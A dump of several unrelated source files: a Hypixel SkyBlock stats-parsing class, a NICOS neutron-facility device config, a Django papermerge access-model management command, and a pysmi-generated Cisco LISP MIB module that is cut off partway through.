stats['kills_skeleton_emperor']) if 'kills_skeleton_emperor' in stats else None
self.mythos_burrows_dug_next = int(
stats['mythos_burrows_dug_next']) if 'mythos_burrows_dug_next' in stats else None
self.common_mythos_burrows_dug_next = int(
stats['mythos_burrows_dug_next_COMMON']) if 'mythos_burrows_dug_next_COMMON' in stats else None
self.mythos_burrows_dug_combat = int(
stats['mythos_burrows_dug_combat']) if 'mythos_burrows_dug_combat' in stats else None
self.common_mythos_burrows_dug_combat = int(
stats['mythos_burrows_dug_combat_COMMON']) if 'mythos_burrows_dug_combat_COMMON' in stats else None
self.mythos_kills = int(stats['kills_mythos']) if 'kills_mythos' in stats else None
self.minos_hunter_kills = int(stats['kills_minos_hunter']) if 'kills_minos_hunter' in stats else None
self.mythos_burrows_dug_treasure = int(
stats['mythos_burrows_dug_treasure']) if 'mythos_burrows_dug_treasure' in stats else None
self.common_mythos_burrows_dug_treasure = int(
stats['mythos_burrows_dug_treasure_COMMON']) if 'mythos_burrows_dug_treasure_COMMON' in stats else None
self.siamese_lynx_kills = int(stats['kills_siamese_lynx']) if 'kills_siamese_lynx' in stats else None
self.mythos_burrows_chains_complete = int(
stats['mythos_burrows_chains_complete']) if 'mythos_burrows_chains_complete' in stats else None
self.common_mythos_burrows_chains_complete = int(stats['mythos_burrows_chains_complete_COMMON']
) if 'mythos_burrows_chains_complete_COMMON' in stats else None
self.rare_mythos_burrows_dug_next = int(
stats['mythos_burrows_dug_next_RARE']) if 'mythos_burrows_dug_next_RARE' in stats else None
self.rare_mythos_burrows_dug_combat = int(
stats['mythos_burrows_dug_combat_RARE']) if 'mythos_burrows_dug_combat_RARE' in stats else None
self.minotaur_deaths = int(stats['deaths_minotaur']) if 'deaths_minotaur' in stats else None
self.minotaur_kills = int(stats['kills_minotaur']) if 'kills_minotaur' in stats else None
self.gaia_construct_kills = int(stats['kills_gaia_construct']) if 'kills_gaia_construct' in stats else None
self.rare_mythos_burrows_dug_treasure = int(
stats['mythos_burrows_dug_treasure_RARE']) if 'mythos_burrows_dug_treasure_RARE' in stats else None
self.rare_mythos_burrows_chains_complete = int(
stats['mythos_burrows_chains_complete_RARE']) if 'mythos_burrows_chains_complete_RARE' in stats else None
self.gaia_construct_deaths = int(stats['deaths_gaia_construct']) if 'deaths_gaia_construct' in stats else None
self.siamese_lynx_deaths = int(stats['deaths_siamese_lynx']) if 'deaths_siamese_lynx' in stats else None
self.deep_sea_protector_kills = int(
stats['kills_deep_sea_protector']) if 'kills_deep_sea_protector' in stats else None
self.water_hydra_kills = int(stats['kills_water_hydra']) if 'kills_water_hydra' in stats else None
self.blue_shark_kills = int(stats['kills_blue_shark']) if 'kills_blue_shark' in stats else None
self.tiger_shark_kills = int(stats['kills_tiger_shark']) if 'kills_tiger_shark' in stats else None
self.nurse_shark_kills = int(stats['kills_nurse_shark']) if 'kills_nurse_shark' in stats else None
self.crypt_souleater_deaths = int(
stats['deaths_crypt_souleater']) if 'deaths_crypt_souleater' in stats else None
self.zombie_knight_kills = int(stats['kills_zombie_knight']) if 'kills_zombie_knight' in stats else None
self.crypt_undead_valentin_kills = int(
stats['kills_crypt_undead_valentin']) if 'kills_crypt_undead_valentin' in stats else None
self.soul_of_the_alpha_deaths = int(
stats['deaths_soul_of_the_alpha']) if 'deaths_soul_of_the_alpha' in stats else None
self.dungeon_hub_precursor_ruins_no_abilities_no_return_best_time = stats[
'dungeon_hub_precursor_ruins_no_abilities_no_return_best_time']
self.crypt_wither_skeleton_kills = int(
stats['kills_crypt_witherskeleton']) if 'kills_crypt_witherskeleton' in stats else None
self.crypt_wither_skeleton_deaths = int(
stats['deaths_crypt_witherskeleton']) if 'deaths_crypt_witherskeleton' in stats else None
self.spirit_wolf_kills = int(stats['kills_spirit_wolf']) if 'kills_spirit_wolf' in stats else None
self.spirit_sheep_kills = int(stats['kills_spirit_sheep']) if 'kills_spirit_sheep' in stats else None
self.spirit_bull_kills = int(stats['kills_spirit_bull']) if 'kills_spirit_bull' in stats else None
self.spirit_rabbit_kills = int(stats['kills_spirit_rabbit']) if 'kills_spirit_rabbit' in stats else None
self.thork_kills = int(stats['kills_thorn']) if 'kills_thorn' in stats else None
self.livid_clone_deaths = int(stats['deaths_livid_clone']) if 'deaths_livid_clone' in stats else None
self.sniper_skeleton_deaths = int(
stats['deaths_sniper_skeleton']) if 'deaths_sniper_skeleton' in stats else None
self.super_tank_zombie_kills = int(
stats['kills_super_tank_zombie']) if 'kills_super_tank_zombie' in stats else None
self.super_archer_kills = int(stats['kills_super_archer']) if 'kills_super_archer' in stats else None
self.tentaclees_deaths = int(stats['deaths_tentaclees']) if 'deaths_tentaclees' in stats else None
self.corrupted_protector_kills = int(
stats['kills_corrupted_protector']) if 'kills_corrupted_protector' in stats else None
self.professer_guardian_summon_kills = int(
stats['kills_professor_guardian_summon']) if 'kills_professor_guardian_summon' in stats else None
self.unstable_dragon_kills = int(stats['kills_unstable_dragon']) if 'kills_unstable_dragon' in stats else None
self.strong_dragon_kills = int(stats['kills_strong_dragon']) if 'kills_strong_dragon' in stats else None
self.spirit_bat_kills = int(stats['kills_spirit_bat']) if 'kills_spirit_bat' in stats else None
self.shadow_assassin_kills = int(stats['kills_shadow_assassin']) if 'kills_shadow_assassin' in stats else None
self.tentaclees_kills = int(stats['kills_tentaclees']) if 'kills_tentaclees' in stats else None
self.livid_deaths = int(stats['deaths_livid']) if 'deaths_livid' in stats else None
self.sadan_statue_deaths = int(stats['deaths_sadan_statue']) if 'deaths_sadan_statue' in stats else None
self.scary_jerry_kills = int(stats['kills_scary_jerry']) if 'kills_scary_jerry' in stats else None
self.wither_gourd_kills = int(stats['kills_wither_gourd']) if 'kills_wither_gourd' in stats else None
self.trick_or_treater_kills = int(
stats['kills_trick_or_treater']) if 'kills_trick_or_treater' in stats else None
self.phantom_spirit_kills = int(stats['kills_phantom_spirit']) if 'kills_phantom_spirit' in stats else None
self.wraith_kills = int(stats['kills_wraith']) if 'kills_wraith' in stats else None
self.batty_witch_kills = int(stats['kills_batty_witch']) if 'kills_batty_witch' in stats else None
self.zombie_commander_kills = int(
stats['kills_zombie_commander']) if 'kills_zombie_commander' in stats else None
self.watcher_guardian_deaths = int(
stats['deaths_watcher_guardian']) if 'deaths_watcher_guardian' in stats else None
self.skeletor_prime_kills = int(stats['kills_skeletor_prime']) if 'kills_skeletor_prime' in stats else None
self.super_tank_zombie_deaths = int(
stats['deaths_super_tank_zombie']) if 'deaths_super_tank_zombie' in stats else None
self.skeletor_prime_deaths = int(stats['deaths_skeletor_prime']) if 'deaths_skeletor_prime' in stats else None
self.great_white_shark_kills = int(
stats['kills_great_white_shark']) if 'kills_great_white_shark' in stats else None
self.zombie_knight_deaths = int(stats['deaths_zombie_knight']) if 'deaths_zombie_knight' in stats else None
self.suffocation_deaths = int(stats['deaths_suffocation']) if 'deaths_suffocation' in stats else None
self.protector_dragon_deaths = int(
stats['deaths_protector_dragon']) if 'deaths_protector_dragon' in stats else None
self.sadan_deaths = int(stats['deaths_sadan']) if 'deaths_sadan' in stats else None
self.sadan_golem_deaths = int(stats['deaths_sadan_golem']) if 'deaths_sadan_golem' in stats else None
self.watcher_scarf_deaths = int(stats['deaths_watcher_scarf']) if 'deaths_watcher_scarf' in stats else None
self.scarf_warrior_kills = int(stats['kills_scarf_warrior']) if 'kills_scarf_warrior' in stats else None
self.crypt_undead_deaths = int(stats['deaths_crypt_undead']) if 'deaths_crypt_undead' in stats else None
self.watcher_scarf_kills = int(stats['kills_watcher_scarf']) if 'kills_watcher_scarf' in stats else None
self.spirit_bat_deaths = int(stats['deaths_spirit_bat']) if 'deaths_spirit_bat' in stats else None
self.spirit_miniboss_deaths = int(
stats['deaths_spirit_miniboss']) if 'deaths_spirit_miniboss' in stats else None
self.spirit_chicken_deaths = int(stats['deaths_spirit_chicken']) if 'deaths_spirit_chicken' in stats else None
self.spirit_sheep_deaths = int(stats['deaths_spirit_sheep']) if 'deaths_spirit_sheep' in stats else None
self.crypt_undead_marius_kills = int(
stats['kills_crypt_undead_marius']) if 'kills_crypt_undead_marius' in stats else None
class SkyBlockObjective(object):
r"""Represents a SkyBlock Objective.
:param objective_name: The name of the objective.
:type objective_name: str
:param objective_data: The objective's data.
:type objective_data: dict"""
def __init__(self, objective_name: str, objective_data: dict):
self.name = objective_name
self.status = objective_data['status']
self.progress = objective_data['progress']
self.completed_at = datetime.datetime.fromtimestamp(
objective_data['completed_at'] / 1000
) if objective_data['completed_at'] != 0 else None
class SkyBlockQuest(object):
r"""Represents a SkyBlock quest.
:param quest_name: The name of the quest.
:type quest_name: str
:param quest_data: The quest's data.
:type quest_data: dict"""
def __init__(self, quest_name: str, quest_data: dict):
self.name = quest_name
self.status = quest_data['status']
self.activated_at = datetime.datetime.fromtimestamp(
quest_data['activated_at'] / 1000
)
self.completed_at = datetime.datetime.fromtimestamp(
quest_data['completed_at'] / 1000
)
class SkyBlockSlayer(object):
r"""Represents a SkyBlock slayer.
:param slayer: The name of the slayer.
:type slayer: str
:param slayer_data: The slayer's data.
:type slayer_data: dict"""
def __init__(self, slayer: str, slayer_data: dict):
self.slayer = slayer
self.claimed_levels = slayer_data['claimed_levels']
self.xp = slayer_data['xp']
self.level = types[slayer](slayer_data['xp'])
class SkyBlockPet(object):
r"""Represents a SkyBlock pet.
:param pet_data: The pet's data.
:type pet_data: dict"""
def __init__(self, pet_data: dict):
self.uuid = pet_data['uuid']
self.type = pet_data['type']
self.xp = pet_data['exp']
self.active = pet_data['active']
self.tier = pet_data['tier']
self.held_item = pet_data['heldItem']
self.candy_used = pet_data['candyUsed']
self.skin = pet_data['skin']
class SkyBlockSkill(object):
r"""Represents a SkyBlock skill.
:param name: The skill's name.
:type name: str
:param skill_data: The skill's data.
:type skill_data: dict"""
def __init__(self, name, skill_data):
self.name = name
self.level = skill_data['level']
self.xp = skill_data['xp']
| 36,682 | 13,134 |
description = 'FRM II Neutron guide hall west infrastructure devices'
group = 'lowlevel'
devices = dict(
Sixfold = device('nicos.devices.generic.ManualSwitch',
description = 'Sixfold shutter status',
states = ('closed', 'open'),
pollinterval = 60,
maxage = 120,
),
Crane = device('nicos.devices.generic.ManualMove',
description = 'The position of the crane in the guide '
'hall West measured from the east end',
abslimits = (0, 60),
pollinterval = 5,
maxage = 30,
unit = 'm',
fmtstr = '%.1f',
),
)
| 604 | 194 |
from .reaction import ReactionGateway
__all__ = [
"ReactionGateway"
] | 74 | 29 |
import logging
from django.core.management.base import BaseCommand
try:
from django_tenants.utils import get_tenant_model
except:
get_tenant_model = None
from django.db import connection
from papermerge.core.models import (
BaseTreeNode,
Access
)
from papermerge.core.auth import (
create_access_perms
)
logger = logging.getLogger(__name__)
class Command(BaseCommand):
help = """Lists/Updates Access Models associated with nodes.
"""
def add_arguments(self, parser):
parser.add_argument(
'--count',
'-c',
action="store_true",
help="Count nodes with/without associated access model."
)
parser.add_argument(
'--update',
'-u',
action="store_true",
help="Updated nodes without associated access model."
)
parser.add_argument(
'--schema-name',
'-s',
help="Run checkaccess for this schema."
)
def run_count(
self,
):
total_count = BaseTreeNode.objects.count()
without_access_count = BaseTreeNode.objects.filter(
access__isnull=True
).count()
print(
f"total={total_count}, without_access={without_access_count}"
)
def run_update(
self
):
perms = create_access_perms()
for node in BaseTreeNode.objects.all():
if node.access_set.count() == 0:
access = Access.objects.create(
user=node.user,
access_type='allow',
node=node
)
access.permissions.add(*perms)
def handle(self, *args, **options):
count = options.get(
'count',
False
)
update = options.get(
'update',
False
)
schema_name = options.get('schema_name', False)
TenantModel = get_tenant_model()
if schema_name:
tenant_list = TenantModel.objects.filter(name=schema_name)
else:
tenant_list = TenantModel.objects.exclude(name="public")
for tenant in tenant_list:
connection.set_tenant(tenant)
if count:
self.run_count()
elif update:
self.run_update()
| 2,366 | 651 |
#
# PySNMP MIB module CISCO-LISP-EXT-MIB (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/CISCO-LISP-EXT-MIB
# Produced by pysmi-0.3.4 at Wed May 1 12:04:38 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
Integer, OctetString, ObjectIdentifier = mibBuilder.importSymbols("ASN1", "Integer", "OctetString", "ObjectIdentifier")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
SingleValueConstraint, ValueSizeConstraint, ValueRangeConstraint, ConstraintsIntersection, ConstraintsUnion = mibBuilder.importSymbols("ASN1-REFINEMENT", "SingleValueConstraint", "ValueSizeConstraint", "ValueRangeConstraint", "ConstraintsIntersection", "ConstraintsUnion")
ciscoMgmt, = mibBuilder.importSymbols("CISCO-SMI", "ciscoMgmt")
AddressFamilyNumbers, = mibBuilder.importSymbols("IANA-ADDRESS-FAMILY-NUMBERS-MIB", "AddressFamilyNumbers")
InetPortNumber, = mibBuilder.importSymbols("INET-ADDRESS-MIB", "InetPortNumber")
lispMappingDatabaseTimeStamp, lispFeaturesMapCacheLimit, lispUseProxyEtrState, lispEidRegistrationSiteName, lispUseMapResolverState, lispFeaturesEntry, lispUseMapServerState, lispGlobalStatsEntry, LispAddressType = mibBuilder.importSymbols("LISP-MIB", "lispMappingDatabaseTimeStamp", "lispFeaturesMapCacheLimit", "lispUseProxyEtrState", "lispEidRegistrationSiteName", "lispUseMapResolverState", "lispFeaturesEntry", "lispUseMapServerState", "lispGlobalStatsEntry", "LispAddressType")
NotificationGroup, ObjectGroup, ModuleCompliance = mibBuilder.importSymbols("SNMPv2-CONF", "NotificationGroup", "ObjectGroup", "ModuleCompliance")
Counter32, TimeTicks, MibScalar, MibTable, MibTableRow, MibTableColumn, Bits, ObjectIdentity, NotificationType, ModuleIdentity, MibIdentifier, iso, Counter64, Unsigned32, IpAddress, Integer32, Gauge32 = mibBuilder.importSymbols("SNMPv2-SMI", "Counter32", "TimeTicks", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "Bits", "ObjectIdentity", "NotificationType", "ModuleIdentity", "MibIdentifier", "iso", "Counter64", "Unsigned32", "IpAddress", "Integer32", "Gauge32")
TextualConvention, TruthValue, TimeStamp, DisplayString = mibBuilder.importSymbols("SNMPv2-TC", "TextualConvention", "TruthValue", "TimeStamp", "DisplayString")
ciscoLispExtMIB = ModuleIdentity((1, 3, 6, 1, 4, 1, 9, 9, 825))
ciscoLispExtMIB.setRevisions(('2015-05-13 00:00',))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
if mibBuilder.loadTexts: ciscoLispExtMIB.setRevisionsDescriptions(('Initial version of the CISCO-LISP-EXT-MIB module.',))
if mibBuilder.loadTexts: ciscoLispExtMIB.setLastUpdated('201505130000Z')
if mibBuilder.loadTexts: ciscoLispExtMIB.setOrganization('Cisco Systems, Inc.')
if mibBuilder.loadTexts: ciscoLispExtMIB.setContactInfo('Cisco Systems Customer Service Postal: 170 W Tasman Drive San Jose, CA 95134 USA Tel: +1 800 553-NETS E-mail: lisp-support@cisco.com')
if mibBuilder.loadTexts: ciscoLispExtMIB.setDescription('This MIB is an extension to the IETF LISP-MIB module defined in RFC 7052. It contains Cisco defined managed objects and traps to support monitoring devices that support the Locator/ID Separation Protocol (LISP).')
ciscoLispExtNotifications = MibIdentifier((1, 3, 6, 1, 4, 1, 9, 9, 825, 0))
ciscoLispExtObjects = MibIdentifier((1, 3, 6, 1, 4, 1, 9, 9, 825, 1))
ciscoLispExtConformance = MibIdentifier((1, 3, 6, 1, 4, 1, 9, 9, 825, 2))
clispExtEidRegRlocMembershipTable = MibTable((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 1), )
if mibBuilder.loadTexts: clispExtEidRegRlocMembershipTable.setReference('LISP RLOC Membership Distribution http://tools.ietf.org/html/draft-kouvelas-lisp-rloc-membership')
if mibBuilder.loadTexts: clispExtEidRegRlocMembershipTable.setStatus('current')
if mibBuilder.loadTexts: clispExtEidRegRlocMembershipTable.setDescription('This table lists the RLOC address gleaned from the map-server registration database for the purpose of RLOC membership. Entry on this table can also be added from configuration.')
clispExtEidRegRlocMembershipEntry = MibTableRow((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 1, 1), ).setIndexNames((0, "CISCO-LISP-EXT-MIB", "clispExtEidRegRlocMembershipInstanceID"), (0, "CISCO-LISP-EXT-MIB", "clispExtEidRegRlocMembershipEidAfi"), (0, "CISCO-LISP-EXT-MIB", "clispExtEidRegRlocMembershipRlocLength"), (0, "CISCO-LISP-EXT-MIB", "clispExtEidRegRlocMembershipRloc"))
if mibBuilder.loadTexts: clispExtEidRegRlocMembershipEntry.setStatus('current')
if mibBuilder.loadTexts: clispExtEidRegRlocMembershipEntry.setDescription('An entry describes an RLOC address gleaned from the map-server registration database.')
clispExtEidRegRlocMembershipInstanceID = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 1, 1, 1), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(0, 16777215)))
if mibBuilder.loadTexts: clispExtEidRegRlocMembershipInstanceID.setStatus('current')
if mibBuilder.loadTexts: clispExtEidRegRlocMembershipInstanceID.setDescription('This object indicates the instance ID of the RLOC address.')
clispExtEidRegRlocMembershipEidAfi = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 1, 1, 2), AddressFamilyNumbers())
if mibBuilder.loadTexts: clispExtEidRegRlocMembershipEidAfi.setStatus('current')
if mibBuilder.loadTexts: clispExtEidRegRlocMembershipEidAfi.setDescription('This object indicates the IANA Address Family Identifier of the RLOC address.')
clispExtEidRegRlocMembershipRlocLength = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 1, 1, 3), Integer32().subtype(subtypeSpec=ValueRangeConstraint(5, 39)))
if mibBuilder.loadTexts: clispExtEidRegRlocMembershipRlocLength.setStatus('current')
if mibBuilder.loadTexts: clispExtEidRegRlocMembershipRlocLength.setDescription('This object indicates the length of the RLOC address.')
clispExtEidRegRlocMembershipRloc = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 1, 1, 4), LispAddressType())
if mibBuilder.loadTexts: clispExtEidRegRlocMembershipRloc.setStatus('current')
if mibBuilder.loadTexts: clispExtEidRegRlocMembershipRloc.setDescription('This object indicates the value of the RLOC address.')
clispExtEidRegRlocMembershipMemberSince = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 1, 1, 5), TimeStamp()).setMaxAccess("readonly")
if mibBuilder.loadTexts: clispExtEidRegRlocMembershipMemberSince.setStatus('current')
if mibBuilder.loadTexts: clispExtEidRegRlocMembershipMemberSince.setDescription('This object indicates the sysUpTime when this RLOC address was registered. If this information was present at the most recent reinitialization of the local management subsystem, then this object contains a zero value.')
clispExtEidRegRlocMembershipGleaned = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 1, 1, 6), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: clispExtEidRegRlocMembershipGleaned.setStatus('current')
if mibBuilder.loadTexts: clispExtEidRegRlocMembershipGleaned.setDescription('This object indicates whether the RLOC address was gleaned from a received EID prefix registration. If this object is true, then it means the RLOC address was gleaned.')
clispExtEidRegRlocMembershipConfigured = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 1, 1, 7), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: clispExtEidRegRlocMembershipConfigured.setStatus('current')
if mibBuilder.loadTexts: clispExtEidRegRlocMembershipConfigured.setDescription('This object indicates whether the RLOC address was added by configuration. If this object is true, then it means the RLOC address was configured.')
clispExtRlocMembershipTable = MibTable((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 2), )
if mibBuilder.loadTexts: clispExtRlocMembershipTable.setReference('LISP RLOC Membership Distribution http://tools.ietf.org/html/draft-kouvelas-lisp-rloc-membership')
if mibBuilder.loadTexts: clispExtRlocMembershipTable.setStatus('current')
if mibBuilder.loadTexts: clispExtRlocMembershipTable.setDescription('This table lists the RLOC membership learned by the xTR. Entry can be learned from the map-server or from configuration.')
clispExtRlocMembershipEntry = MibTableRow((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 2, 1), ).setIndexNames((0, "CISCO-LISP-EXT-MIB", "clispExtRlocMembershipInstanceID"), (0, "CISCO-LISP-EXT-MIB", "clispExtRlocMembershipEidAfi"), (0, "CISCO-LISP-EXT-MIB", "clispExtRlocMembershipRlocLength"), (0, "CISCO-LISP-EXT-MIB", "clispExtRlocMembershipRloc"))
if mibBuilder.loadTexts: clispExtRlocMembershipEntry.setStatus('current')
if mibBuilder.loadTexts: clispExtRlocMembershipEntry.setDescription('An entry describes the RLOC membership learned by the xTR.')
clispExtRlocMembershipInstanceID = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 2, 1, 1), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(0, 16777215)))
if mibBuilder.loadTexts: clispExtRlocMembershipInstanceID.setStatus('current')
if mibBuilder.loadTexts: clispExtRlocMembershipInstanceID.setDescription('This object indicates the instance ID of the RLOC membership.')
clispExtRlocMembershipEidAfi = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 2, 1, 2), AddressFamilyNumbers())
if mibBuilder.loadTexts: clispExtRlocMembershipEidAfi.setStatus('current')
if mibBuilder.loadTexts: clispExtRlocMembershipEidAfi.setDescription('This object indicates the IANA Address Family Identifier of the RLOC membership.')
clispExtRlocMembershipRlocLength = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 2, 1, 3), Integer32().subtype(subtypeSpec=ValueRangeConstraint(5, 39)))
if mibBuilder.loadTexts: clispExtRlocMembershipRlocLength.setStatus('current')
if mibBuilder.loadTexts: clispExtRlocMembershipRlocLength.setDescription('This object indicates the length of the RLOC membership.')
clispExtRlocMembershipRloc = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 2, 1, 4), LispAddressType())
if mibBuilder.loadTexts: clispExtRlocMembershipRloc.setStatus('current')
if mibBuilder.loadTexts: clispExtRlocMembershipRloc.setDescription('This object indicates the value of the RLOC membership.')
clispExtRlocMembershipMemberSince = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 2, 1, 5), TimeStamp()).setMaxAccess("readonly")
if mibBuilder.loadTexts: clispExtRlocMembershipMemberSince.setStatus('current')
if mibBuilder.loadTexts: clispExtRlocMembershipMemberSince.setDescription('This object indicates the sysUpTime when the RLOC membership was added. If this information was present at the most recent reinitialization of the local management subsystem, then this object contains a zero value.')
clispExtRlocMembershipDiscovered = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 2, 1, 6), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: clispExtRlocMembershipDiscovered.setStatus('current')
if mibBuilder.loadTexts: clispExtRlocMembershipDiscovered.setDescription('This object indicates whether the RLOC membership was learned from the map-server. If this object is true, then it means the RLOC membership was learned.')
clispExtRlocMembershipConfigured = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 2, 1, 7), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: clispExtRlocMembershipConfigured.setStatus('current')
if mibBuilder.loadTexts: clispExtRlocMembershipConfigured.setDescription('This object indicates whether the RLOC membership was added by configuration. If this object is true, then it means the RLOC membership was configured.')
clispExtReliableTransportSessionTable = MibTable((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 3), )
if mibBuilder.loadTexts: clispExtReliableTransportSessionTable.setReference('LISP Reliable Transport http://tools.ietf.org/html/draft-kouvelas-lisp-reliable-transport')
if mibBuilder.loadTexts: clispExtReliableTransportSessionTable.setStatus('current')
if mibBuilder.loadTexts: clispExtReliableTransportSessionTable.setDescription('This table lists the reliable transport sessions. The session may or may not be in established state.')
clispExtReliableTransportSessionEntry = MibTableRow((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 3, 1), ).setIndexNames((0, "CISCO-LISP-EXT-MIB", "clispExtReliableTransportSessionPeerAddressLength"), (0, "CISCO-LISP-EXT-MIB", "clispExtReliableTransportSessionPeerAddress"), (0, "CISCO-LISP-EXT-MIB", "clispExtReliableTransportSessionPeerPort"), (0, "CISCO-LISP-EXT-MIB", "clispExtReliableTransportSessionLocalAddressLength"), (0, "CISCO-LISP-EXT-MIB", "clispExtReliableTransportSessionLocalAddress"), (0, "CISCO-LISP-EXT-MIB", "clispExtReliableTransportSessionLocalPort"))
if mibBuilder.loadTexts: clispExtReliableTransportSessionEntry.setStatus('current')
if mibBuilder.loadTexts: clispExtReliableTransportSessionEntry.setDescription('An entry describes the reliable transport session.')
clispExtReliableTransportSessionPeerAddressLength = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 3, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(5, 39)))
if mibBuilder.loadTexts: clispExtReliableTransportSessionPeerAddressLength.setStatus('current')
if mibBuilder.loadTexts: clispExtReliableTransportSessionPeerAddressLength.setDescription('This object indicates the length of the reliable transport session peer address.')
clispExtReliableTransportSessionPeerAddress = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 3, 1, 2), LispAddressType())
if mibBuilder.loadTexts: clispExtReliableTransportSessionPeerAddress.setStatus('current')
if mibBuilder.loadTexts: clispExtReliableTransportSessionPeerAddress.setDescription('This object indicates the peer address of the reliable transport session.')
clispExtReliableTransportSessionPeerPort = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 3, 1, 3), InetPortNumber())
if mibBuilder.loadTexts: clispExtReliableTransportSessionPeerPort.setStatus('current')
if mibBuilder.loadTexts: clispExtReliableTransportSessionPeerPort.setDescription('This object indicates the peer port of the reliable transport session.')
clispExtReliableTransportSessionLocalAddressLength = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 3, 1, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(5, 39)))
if mibBuilder.loadTexts: clispExtReliableTransportSessionLocalAddressLength.setStatus('current')
if mibBuilder.loadTexts: clispExtReliableTransportSessionLocalAddressLength.setDescription('This object indicates the length of the reliable transport session local address.')
clispExtReliableTransportSessionLocalAddress = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 3, 1, 5), LispAddressType())
if mibBuilder.loadTexts: clispExtReliableTransportSessionLocalAddress.setStatus('current')
if mibBuilder.loadTexts: clispExtReliableTransportSessionLocalAddress.setDescription('This object indicates the local address of the reliable transport session.')
clispExtReliableTransportSessionLocalPort = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 3, 1, 6), InetPortNumber())
if mibBuilder.loadTexts: clispExtReliableTransportSessionLocalPort.setStatus('current')
if mibBuilder.loadTexts: clispExtReliableTransportSessionLocalPort.setDescription('This object indicates the local port of the reliable transport session.')
clispExtReliableTransportSessionState = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 3, 1, 7), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("up", 1), ("down", 2)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: clispExtReliableTransportSessionState.setStatus('current')
if mibBuilder.loadTexts: clispExtReliableTransportSessionState.setDescription('This object indicates the state of the reliable transport session.')
clispExtReliableTransportSessionLastStateChangeTime = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 3, 1, 8), TimeStamp()).setMaxAccess("readonly")
if mibBuilder.loadTexts: clispExtReliableTransportSessionLastStateChangeTime.setStatus('current')
if mibBuilder.loadTexts: clispExtReliableTransportSessionLastStateChangeTime.setDescription('This object indicates the sysUpTime of the last UP/DOWN state transition on the reliable transport session.')
clispExtReliableTransportSessionEstablishmentRole = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 3, 1, 9), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("passive", 1), ("active", 2)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: clispExtReliableTransportSessionEstablishmentRole.setStatus('current')
if mibBuilder.loadTexts: clispExtReliableTransportSessionEstablishmentRole.setDescription("This object indicates the role of the reliable transport session. 'active' Connection was initiated locally by the LISP router. 'passive' Connection was accepted by the LISP router listening on the well-known local transport port.")
clispExtReliableTransportSessionMessagesIn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 3, 1, 10), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: clispExtReliableTransportSessionMessagesIn.setStatus('current')
if mibBuilder.loadTexts: clispExtReliableTransportSessionMessagesIn.setDescription('This object indicates the number of messages received on this reliable transport session.')
clispExtReliableTransportSessionMessagesOut = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 3, 1, 11), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: clispExtReliableTransportSessionMessagesOut.setStatus('current')
if mibBuilder.loadTexts: clispExtReliableTransportSessionMessagesOut.setDescription('This object indicates the number of messages sent on this reliable transport session.')
clispExtReliableTransportSessionBytesIn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 3, 1, 12), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: clispExtReliableTransportSessionBytesIn.setStatus('current')
if mibBuilder.loadTexts: clispExtReliableTransportSessionBytesIn.setDescription('This object indicates the number of bytes received on this reliable transport session.')
clispExtReliableTransportSessionBytesOut = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 3, 1, 13), Counter64()).setMaxAccess("readonly")
